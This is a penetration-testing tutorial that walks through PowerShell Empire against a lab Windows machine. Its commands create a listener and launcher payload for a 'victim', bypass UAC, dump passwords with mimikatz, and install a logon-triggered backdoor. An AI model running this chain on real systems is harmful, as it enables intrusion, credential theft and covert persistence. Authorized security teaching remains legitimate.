[ Pen Testing Windows ] :: Penetration Testing Windows: Powershell/Empire

Powershell

Powershell is the object-oriented replacement for the ancient Windows cmd.exe. It it not present on all installations of Windows, but can be added via a download from Microsoft.

There are five versions of Powershell at the moment (2018). You can start it by typing powershell in the runline or in cmd.

Before going any further, read this presentation:
https://cdn.shopify.com/s/files/1/0177/9886/files/nmittal.pdf

And see this quick description with handy hints:
https://www.darkoperator.com/blog/2013/1/10/powershell-basicsndashthe-environment.html

Empire

Empire lets you run Powershell agents without needing Powershell to be installed on your target.

Here’s a good intro:
https://ethicalhackingblog.com/hacking-powershell-empire-2-0/

You may need to install Empire

git clone https://github.com/EmpireProject/Empire.git
cd Empire
chmod +x install.sh

Enter a password or let it generate one for you.

$./install.sh

Create a listener

Start Empire:

./empire
# list listeners
listeners
# use the http listener
uselistener http
execute
# now our listener should show up:
listeners

Create a PowerShell script and send it to your victim using the launcher

Create a launcher:

launcher

Generate a Powershell script with the listener name http:

 launcher powershell http

Copy the resulting Powershell script.

Open a new terminal and start a remote desktop session: (this is noisy, so consider terminal alternatives)

rdesktop -u IEUser -p password 192.168.0.11

In the remote desktop, open a cmd shell and paste in the script. Hit Enter.

Back in the Linux Empire terminal session, see that there is now an agent active.

In this terminal go back to the main window:

back

List available agents:

agents

Note the Name of the agent. It’s random and complex, so rename it:

 rename [old name] [new name]

Now to list the active agents enter:

list

Interact with our agent:

 interact http

Get info on the agent:

info

High_integrity 0 means we’re not an admin.

Become an admin, amazingly, with a single command, followed by the name of the listener:

bypassuac http

Now type:

[enter]
back
list

Note the new listener and the user names listed. An asterisk indicates a power user. Rename this new listener too:

rename [old name] [new name]

Now let’s interact with the new agent:

interact [agent name]
info

High_integrity 1 now indicates we’re admin!

List all extracted passwords (there aren’t any yet):

creds

Run mimikatz and wait for it to execute. Note that this may crash the LSASS process, making us very conspicuous. See another way to get AD information at https://schoolforhackers.com/penetration-testing-windows-active-directory-extracting-ntds-and-cracking-hashes/.

mimikatz

Once it’s done type:

creds

and see the cracked passwords.

Create a persistent backdoor with the module schtasks:

usemodule persistence/elevated/schtasks
# check its options
info
# set
set OnLogon True
set Listener http
# exploit!
execute

Now our backdoor will execute every time the user logs on.